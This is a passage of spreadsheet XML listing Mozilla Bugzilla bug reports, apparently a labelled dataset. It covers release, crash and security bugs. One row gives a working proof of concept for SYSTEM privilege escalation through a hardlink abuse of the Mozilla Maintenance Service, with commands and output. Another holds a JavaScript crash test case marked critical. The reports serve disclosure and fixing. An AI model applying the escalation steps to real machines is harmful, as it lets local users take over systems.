      </c>
      <c r="P5790" t="inlineStr">
        <is>
          <t>[releases][updates]</t>
        </is>
      </c>
      <c r="Q5790" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5790" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5790" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5790" t="n">
        <v>1</v>
      </c>
      <c r="U5790" t="n">
        <v>0</v>
      </c>
      <c r="V5790" t="n">
        <v>5</v>
      </c>
      <c r="W5790" t="inlineStr">
        <is>
          <t>Created attachment 589831
Remove "as" from 20120104111456
Assamese was added before 10.0b3 (bug 716688) what means there is no update for this locale for this particular build (20120104111456). Our update verify configs bumper is not smart  enough to handle such situations and adds new locales what causes update verification and final verification failures:
FAIL: no complete update found for https://aus3.mozilla.org/update/1/Firefox/10.0/20120104111456/WINNT_x86-msvc/as/releasetest/update.xml?force=1
FAIL: download_mars returned non-zero exit code: 1
It would be better just remove "as" manually from 20120104111456.</t>
        </is>
      </c>
      <c r="X5790" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5791">
      <c r="A5791" t="n">
        <v>1182723</v>
      </c>
      <c r="B5791" t="inlineStr">
        <is>
          <t>2015-07-10 17:13:19 -0700</t>
        </is>
      </c>
      <c r="C5791" t="inlineStr">
        <is>
          <t>Self-assignment in nsTArray_Impl causes memory-safety bug</t>
        </is>
      </c>
      <c r="D5791" t="inlineStr">
        <is>
          <t>2024-05-30 09:03:05 -0700</t>
        </is>
      </c>
      <c r="E5791" t="n">
        <v>1</v>
      </c>
      <c r="F5791" t="n">
        <v>1</v>
      </c>
      <c r="G5791" t="n">
        <v>3</v>
      </c>
      <c r="H5791" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5791" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5791" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K5791" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5791" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5791" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5791" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5791" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5791" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main40+][adv-esr38.2+]</t>
        </is>
      </c>
      <c r="Q5791" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5791" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5791" t="inlineStr">
        <is>
          <t>mozilla42</t>
        </is>
      </c>
      <c r="T5791" t="n">
        <v>1</v>
      </c>
      <c r="U5791" t="n">
        <v>0</v>
      </c>
      <c r="V5791" t="n">
        <v>17</v>
      </c>
      <c r="W5791" t="inlineStr">
        <is>
          <t>Assigning an array object based upon nsTArray_Impl to itself causes the destruction of the array's elements, followed by the construction of new elements from the memory that contained the destroyed elements. If the element type has a nontrivial destructor, this almost certainly results in the construction of invalid new elements, such as those containing pointers to unowned memory.
The bug is that the copy-assignment operator does not check for self-assignment.
I do not know whether any code actually does such a self-assignment.
There is also a similar bug in the move-assignment operator, which is less serious because it clears the object, then assigns it to itself.</t>
        </is>
      </c>
      <c r="X5791" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5792">
      <c r="A5792" t="n">
        <v>1442690</v>
      </c>
      <c r="B5792" t="inlineStr">
        <is>
          <t>2018-03-02 09:30:47 -0800</t>
        </is>
      </c>
      <c r="C5792" t="inlineStr">
        <is>
          <t>perfherder fails to fetch data from try</t>
        </is>
      </c>
      <c r="D5792" t="inlineStr">
        <is>
          <t>2018-03-02 13:25:06 -0800</t>
        </is>
      </c>
      <c r="E5792" t="n">
        <v>1</v>
      </c>
      <c r="F5792" t="n">
        <v>1</v>
      </c>
      <c r="G5792" t="n">
        <v>7</v>
      </c>
      <c r="H5792" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5792" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5792" t="inlineStr">
        <is>
          <t>Perfherder</t>
        </is>
      </c>
      <c r="K5792" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5792" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5792" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5792" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5792" t="inlineStr"/>
      <c r="Q5792" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5792" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5792" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5792" t="n">
        <v>1</v>
      </c>
      <c r="U5792" t="n">
        <v>0</v>
      </c>
      <c r="V5792" t="n">
        <v>7</v>
      </c>
      <c r="W5792" t="inlineStr">
        <is>
          <t>https://treeherder.mozilla.org/perf.html#/comparechooser?newProject=try&amp;newRevision=c9d0c882eab1b196d5dd501d2aed4478aa2abd73
this is a push from today on try that should work, but when clicking the 'compare' button, I get an error:
No results found for revision c9d0c882eab1b196d5dd501d2aed4478aa2abd73 on project try
in network monitor, I see a request for:
https://treeherder.mozilla.org/api/project/mozilla-inbound/resultset/?revision=c9d0c882eab1b196d5dd501d2aed4478aa2abd73
which has no results, but when I change it to use the 'try' project:
https://treeherder.mozilla.org/api/project/try/resultset/?revision=c9d0c882eab1b196d5dd501d2aed4478aa2abd73
there is more data in the resulting query.</t>
        </is>
      </c>
      <c r="X5792" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5793">
      <c r="A5793" t="n">
        <v>1320695</v>
      </c>
      <c r="B5793" t="inlineStr">
        <is>
          <t>2016-11-28 07:38:39 -0800</t>
        </is>
      </c>
      <c r="C5793" t="inlineStr">
        <is>
          <t>Enable use of session ticket keys if server has no RSA key pair</t>
        </is>
      </c>
      <c r="D5793" t="inlineStr">
        <is>
          <t>2017-01-29 15:49:53 -0800</t>
        </is>
      </c>
      <c r="E5793" t="n">
        <v>1</v>
      </c>
      <c r="F5793" t="n">
        <v>1</v>
      </c>
      <c r="G5793" t="n">
        <v>3</v>
      </c>
      <c r="H5793" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5793" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5793" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5793" t="inlineStr">
        <is>
          <t>3.27</t>
        </is>
      </c>
      <c r="L5793" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5793" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5793" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5793" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5793" t="inlineStr"/>
      <c r="Q5793" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5793" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5793" t="inlineStr">
        <is>
          <t>3.30</t>
        </is>
      </c>
      <c r="T5793" t="n">
        <v>1</v>
      </c>
      <c r="U5793" t="n">
        <v>0</v>
      </c>
      <c r="V5793" t="n">
        <v>15</v>
      </c>
      <c r="W5793" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Build ID: 20160729111717
Steps to reproduce:
# NSS_CIPHER="C00A"
# OPENSSL_CIPHER="ECDHE-ECDSA-AES256-SHA"
# ulimit -c unlimited
# openssl ecparam -genkey -name prime256v1 -out ec.key
# openssl req -new -x509 -key ec.key -out ec-cert.pem -days 3650 -subj "/CN=localhost" -nodes
# openssl pkcs12 -name ec -export -inkey ec.key -out ec.p12 -in ec-cert.pem -passout "pass:"
# mkdir nssdb
# certutil -N --empty-password -d sql:./nssdb
# certutil -A -d sql:./nssdb/ -n ec -t ',,' -a -i ec-cert.pem
# pk12util -i ec.p12 -d sql:./nssdb -W ''
# /usr/lib64/nss/unsupported-tools/selfserv -d sql:./nssdb/ -p 4433 -V tls1.0: -H 1 -e ec -c :$NSS_CIPHER -u &amp;&gt;server.log &amp;
# sleep 3
# openssl s_client -connect localhost:4433 -CAfile ec-cert.pem -cipher $OPENSSL_CIPHER -sess_out sess.pem 2&gt;&gt;client_err.log &gt;&gt;client_out.log &lt; /dev/null
# openssl s_client -connect localhost:4433 -CAfile ec-cert.pem -cipher $OPENSSL_CIPHER -sess_out sess.pem 2&gt;&gt;client_err.log &gt;&gt;client_out.log &lt; /dev/null
Actual results:
# cat client_err.log 
depth=0 CN = localhost
verify return:1
139942008751992:error:140790E5:SSL routines:ssl23_write:ssl handshake failure:s23_lib.c:177:
depth=0 CN = localhost
verify return:1
139640958179192:error:140790E5:SSL routines:ssl23_write:ssl handshake failure:s23_lib.c:177:
# cat server.log 
selfserv: HDX PR_Read returned error 0:
Success
selfserv: HDX PR_Read returned error -5925:
The one-time function was previously called and failed. Its error code is no longer available
Expected results:
Handshake should not fail and selfserv should be able to handle following connections.
Example using SessionID:
# NSS_CIPHER="C00A"
# OPENSSL_CIPHER="ECDHE-ECDSA-AES256-SHA"
# ulimit -c unlimited
# openssl ecparam -genkey -name prime256v1 -out ec.key
# openssl req -new -x509 -key ec.key -out ec-cert.pem -days 3650 -subj "/CN=localhost" -nodes
# openssl pkcs12 -name ec -export -inkey ec.key -out ec.p12 -in ec-cert.pem -passout "pass:"
# mkdir nssdb
# certutil -N --empty-password -d sql:./nssdb
# certutil -A -d sql:./nssdb/ -n ec -t ',,' -a -i ec-cert.pem
# pk12util -i ec.p12 -d sql:./nssdb -W ''
# /usr/lib64/nss/unsupported-tools/selfserv -d sql:./nssdb/ -p 4433 -V tls1.0: -H 1 -e ec -c :$NSS_CIPHER &amp;&gt;server.log &amp;
# sleep 3
# openssl s_client -connect localhost:4433 -CAfile ec-cert.pem -cipher $OPENSSL_CIPHER -sess_out sess.pem -no_ticket 2&gt;&gt;client_err.log &gt;&gt;client_out.log &lt; /dev/null
# openssl s_client -connect localhost:4433 -CAfile ec-cert.pem -cipher $OPENSSL_CIPHER -sess_out sess.pem -no_ticket 2&gt;&gt;client_err.log &gt;&gt;client_out.log &lt; /dev/null
## RESULTS:
# cat server.log
# cat client_err.log 
depth=0 CN = localhost
verify return:1
DONE
depth=0 CN = localhost
verify return:1
DONE</t>
        </is>
      </c>
      <c r="X5793" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5794">
      <c r="A5794" t="n">
        <v>1551913</v>
      </c>
      <c r="B5794" t="inlineStr">
        <is>
          <t>2019-05-15 08:09:16 -0700</t>
        </is>
      </c>
      <c r="C5794" t="inlineStr">
        <is>
          <t>SYSTEM Privilege escalation via file permission overwrite by Maintenance Service</t>
        </is>
      </c>
      <c r="D5794" t="inlineStr">
        <is>
          <t>2024-05-30 09:59:31 -0700</t>
        </is>
      </c>
      <c r="E5794" t="n">
        <v>1</v>
      </c>
      <c r="F5794" t="n">
        <v>1</v>
      </c>
      <c r="G5794" t="n">
        <v>3</v>
      </c>
      <c r="H5794" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5794" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J5794" t="inlineStr">
        <is>
          <t>Application Update</t>
        </is>
      </c>
      <c r="K5794" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5794" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5794" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5794" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5794" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5794" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][adv-main69+][adv-esr68.1+][post-cristsmash-triage]</t>
        </is>
      </c>
      <c r="Q5794" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5794" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5794" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5794" t="n">
        <v>1</v>
      </c>
      <c r="U5794" t="n">
        <v>0</v>
      </c>
      <c r="V5794" t="n">
        <v>32</v>
      </c>
      <c r="W5794" t="inlineStr">
        <is>
          <t>Created attachment 9065096
CreateHardlink.exe
When running the Windows Mozilla Maintenace Service's fix-update-directory-perms command, it guards against symlinked/junctioned directories pointing to another folder, but does not guard against files being hardlinked to another file.
By placing a hardlink to a file in the C:\ProgramData\Mozilla\updates\ directory we can overwrite its permissions to Full Control for local users.
If we use this to overwrite the permissions of the C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe file itself, we can replace it with a binary we control and achieve arbitrary code execution as the SYSTEM user.
You can use the CreateHardlink program from https://github.com/googleprojectzero/symboliclink-testing-tools/tree/master/CreateHardlink to do this - I've attached a prebuilt binary for convenience.
I tested this on version 68.0.0.7074 of the maintenanceservice.exe.
POC:
C:\Users\Seb&gt;icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                                          BUILTIN\Administrators:(I)(F)
                                                                          BUILTIN\Users:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                                          APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APP PACKAGES:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\Seb&gt;CreateHardlink.exe C:\ProgramData\Mozilla\updates\evil_hardlink "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Done
C:\Users\Seb&gt;sc start MozillaMaintenance aaa fix-update-directory-perms .
SERVICE_NAME: MozillaMaintenance
        TYPE               : 110  WIN32_OWN_PROCESS  (interactive)
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 12012
        FLAGS              :
C:\Users\Seb&gt;icacls "c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
c:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe BUILTIN\Users:(F)
                                                                          BUILTIN\Administrators:(F)
                                                                          NT AUTHORITY\SYSTEM:(F)
                                                                          BUILTIN\Users:(I)(F)
                                                                          BUILTIN\Administrators:(I)(F)
                                                                          NT AUTHORITY\SYSTEM:(I)(F)
Successfully processed 1 files; Failed processing 0 files</t>
        </is>
      </c>
      <c r="X5794" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5795">
      <c r="A5795" t="n">
        <v>715662</v>
      </c>
      <c r="B5795" t="inlineStr">
        <is>
          <t>2012-01-05 13:51:23 -0800</t>
        </is>
      </c>
      <c r="C5795" t="inlineStr">
        <is>
          <t>browser-only methodjit crash (triggered by CSS transform tests)</t>
        </is>
      </c>
      <c r="D5795" t="inlineStr">
        <is>
          <t>2012-12-10 07:23:55 -0800</t>
        </is>
      </c>
      <c r="E5795" t="n">
        <v>1</v>
      </c>
      <c r="F5795" t="n">
        <v>1</v>
      </c>
      <c r="G5795" t="n">
        <v>3</v>
      </c>
      <c r="H5795" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5795" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5795" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K5795" t="inlineStr">
        <is>
          <t>Other Branch</t>
        </is>
      </c>
      <c r="L5795" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5795" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5795" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5795" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5795" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q5795" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5795" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5795" t="inlineStr">
        <is>
          <t>mozilla10</t>
        </is>
      </c>
      <c r="T5795" t="n">
        <v>1</v>
      </c>
      <c r="U5795" t="n">
        <v>0</v>
      </c>
      <c r="V5795" t="n">
        <v>12</v>
      </c>
      <c r="W5795" t="inlineStr">
        <is>
          <t>Found by Aryeh Gregor, see URL. I can't get it to happen in the shell.
&lt;!doctype html&gt;
&lt;script&gt;
var p = [[0]];
function f(y) {
    var a, b, c, d;
    for (var k = 0; k &lt; 2; k++) {
	var z = 0 + p[0][0] - y;
	if (a === undefined || z &lt; a)
	    a = z;
	if (c === undefined || z &gt; c)
	    c = z;
    }
    throw 0;
}
var arr = [1, 1, 1, 1, 1, 1, 1, 0.5];
for (var i = 0; i &lt; 5; i++) {
    for (var j = 0; j &lt; 8; j++) {
        try {
            f(arr[j]);
        } catch (exc) {
            console.log("fail");
        }
    }
}
&lt;/script&gt;</t>
        </is>
      </c>
      <c r="X5795" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5796">
      <c r="A5796" t="n">
        <v>1359605</v>
      </c>
      <c r="B5796" t="inlineStr">
        <is>
          <t>2017-04-25 13:53:35 -0700</t>
        </is>
      </c>
      <c r="C5796" t="inlineStr">
        <is>
          <t>BAD_ACCESS in NotificationRootViewController.swift</t>
        </is>
      </c>
      <c r="D5796" t="inlineStr">
        <is>
          <t>2017-04-27 17:45:53 -0700</t>
        </is>
      </c>
      <c r="E5796" t="n">
        <v>1</v>
      </c>
      <c r="F5796" t="n">
        <v>1</v>
      </c>
      <c r="G5796" t="n">
        <v>2</v>
      </c>
      <c r="H5796" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5796" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J5796" t="inlineStr">
        <is>
          <t>Browser</t>
        </is>
      </c>
      <c r="K5796" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5796" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M5796" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N5796" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5796" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5796" t="inlineStr">
        <is>
          <t>[MobileCore]</t>
        </is>
      </c>
      <c r="Q5796" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5796" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5796" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5796" t="n">
        <v>1</v>
      </c>
      <c r="U5796" t="n">
        <v>0</v>
      </c>
      <c r="V5796" t="n">
        <v>3</v>
      </c>
      <c r="W5796" t="inlineStr">
        <is>
          <t>originally there was a bug with UI code being modified from a background thread in
NotificationRootViewController.swift:didFinishSyncing
I decided to wrap things in DispatchAsync.main but that seems like it introduced a crash. I'll need to investigate this a bit more 
First step is undoing the change I introduced that is causing the crash. Then to figure out what the problem actually is. It is probably related to the multiple dispatch_asyncs and the defer call.</t>
        </is>
      </c>
      <c r="X5796" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5797">
      <c r="A5797" t="n">
        <v>718783</v>
      </c>
      <c r="B5797" t="inlineStr">
        <is>
          <t>2012-01-17 12:20:03 -0800</t>
        </is>
      </c>
      <c r="C5797" t="inlineStr">
        <is>
          <t>Tracking bug for build and release of Firefox/Fennec 11.0b4</t>
        </is>
      </c>
      <c r="D5797" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5797" t="n">
        <v>1</v>
      </c>
      <c r="F5797" t="n">
        <v>1</v>
      </c>
      <c r="G5797" t="n">
        <v>5</v>
      </c>
      <c r="H5797" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5797" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5797" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5797" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5797" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5797" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5797" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5797" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5797" t="inlineStr"/>
      <c r="Q5797" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5797" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5797" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5797" t="n">
        <v>1</v>
      </c>
      <c r="U5797" t="n">
        <v>0</v>
      </c>
      <c r="V5797" t="n">
        <v>5</v>
      </c>
      <c r="W5797" t="inlineStr">
        <is>
          <t>Expected "go" to build on the week of Feb. 20th.</t>
        </is>
      </c>
      <c r="X5797" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5798">
      <c r="A5798" t="n">
        <v>481434</v>
      </c>
      <c r="B5798" t="inlineStr">
        <is>
          <t>2009-03-04 09:04:37 -0800</t>
        </is>
      </c>
      <c r="C5798" t="inlineStr">
        <is>
          <t>Lack of XOW for |this|</t>
        </is>
      </c>
      <c r="D5798" t="inlineStr">
        <is>
          <t>2009-07-21 17:25:50 -0700</t>
        </is>
      </c>
      <c r="E5798" t="n">
        <v>1</v>
      </c>
      <c r="F5798" t="n">
        <v>1</v>
      </c>
      <c r="G5798" t="n">
        <v>3</v>
      </c>
      <c r="H5798" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5798" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5798" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5798" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5798" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5798" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N5798" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5798" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5798" t="inlineStr">
        <is>
          <t>[sg:high] regression from regression fix for security fix 460882</t>
        </is>
      </c>
      <c r="Q5798" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5798" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5798" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5798" t="n">
        <v>1</v>
      </c>
      <c r="U5798" t="n">
        <v>0</v>
      </c>
      <c r="V5798" t="n">
        <v>14</v>
      </c>
      <c r="W5798" t="inlineStr">
        <is>
          <t>This seems to be a regression from bug 480430.
When accessing a window by using |this|, __parent__ property or valueOf.call(),
the window is not wrapped in XOW.</t>
        </is>
      </c>
      <c r="X5798" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5799">
      <c r="A5799" t="n">
        <v>577139</v>
      </c>
      <c r="B5799" t="inlineStr">
        <is>
          <t>2010-07-06 13:04:01 -0700</t>
        </is>
      </c>
      <c r="C5799" t="inlineStr">
        <is>
          <t>[SECURITY] request.cgi and duplicates.cgi let you know whether a product exists or not</t>
        </is>
      </c>
      <c r="D5799" t="inlineStr">
        <is>
          <t>2010-08-05 21:39:57 -0700</t>
        </is>
      </c>
      <c r="E5799" t="n">
        <v>1</v>
      </c>
      <c r="F5799" t="n">
        <v>1</v>
      </c>
      <c r="G5799" t="n">
        <v>4</v>
      </c>
      <c r="H5799" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5799" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J5799" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K5799" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L5799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5799" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5799" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5799" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5799" t="inlineStr">
        <is>
          <t>[4.0/4.2 fixed by bug 519835]</t>
        </is>
      </c>
      <c r="Q5799" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5799" t="inlineStr">
        <is>
          <t>minor</t>
        </is>
      </c>
      <c r="S5799" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T5799" t="n">
        <v>1</v>
      </c>
      <c r="U5799" t="n">
        <v>0</v>
      </c>
      <c r="V5799" t="n">
        <v>13</v>
      </c>
      <c r="W5799" t="inlineStr">
        <is>
          <t>Bugzilla::Product::check_product() throws an error if you pass a product name which doesn't exist, letting the user know whether it's a valid product name or not.
This is going to be fixed in Bugzilla 4.2 as part of bug 519835.</t>
        </is>
      </c>
      <c r="X5799" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5800">
      <c r="A5800" t="n">
        <v>1887614</v>
      </c>
      <c r="B5800" t="inlineStr">
        <is>
          <t>2024-03-25 03:21:27 -0700</t>
        </is>
      </c>
      <c r="C5800" t="inlineStr">
        <is>
          <t>Incorrect parsing of &lt;file:.&gt; URL</t>
        </is>
      </c>
      <c r="D5800" t="inlineStr">
        <is>
          <t>2024-04-08 11:04:29 -0700</t>
        </is>
      </c>
      <c r="E5800" t="n">
        <v>1</v>
      </c>
      <c r="F5800" t="n">
        <v>1</v>
      </c>
      <c r="G5800" t="n">
        <v>3</v>
      </c>
      <c r="H5800" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5800" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5800" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5800" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5800" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5800" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5800" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5800" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5800" t="inlineStr">
        <is>
          <t>[necko-triaged], [wptsync upstream]</t>
        </is>
      </c>
      <c r="Q5800" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5800" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5800" t="inlineStr">
        <is>
          <t>126 Branch</t>
        </is>
      </c>
      <c r="T5800" t="n">
        <v>1</v>
      </c>
      <c r="U5800" t="n">
        <v>0</v>
      </c>
      <c r="V5800" t="n">
        <v>8</v>
      </c>
      <c r="W5800" t="inlineStr">
        <is>
          <t>Parsing `file:.` should produce `file:///` instead of `file:///.` (Parsing `file:///.` correctly results in `file:///` however). The same applies to to `file:..` (two dots)</t>
        </is>
      </c>
      <c r="X5800" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5801">
      <c r="A5801" t="n">
        <v>1170768</v>
      </c>
      <c r="B5801" t="inlineStr">
        <is>
          <t>2015-06-02 14:18:39 -0700</t>
        </is>
      </c>
      <c r="C5801" t="inlineStr">
        <is>
          <t>Traffic Firefox Hello (Hello_Directory1)</t>
        </is>
      </c>
      <c r="D5801" t="inlineStr">
        <is>
          <t>2015-07-21 11:52:48 -0700</t>
        </is>
      </c>
      <c r="E5801" t="n">
        <v>1</v>
      </c>
      <c r="F5801" t="n">
        <v>1</v>
      </c>
      <c r="G5801" t="n">
        <v>6</v>
      </c>
      <c r="H5801" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I5801" t="inlineStr">
        <is>
          <t>Content Services Graveyard</t>
        </is>
      </c>
      <c r="J5801" t="inlineStr">
        <is>
          <t>Traffic</t>
        </is>
      </c>
      <c r="K5801" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
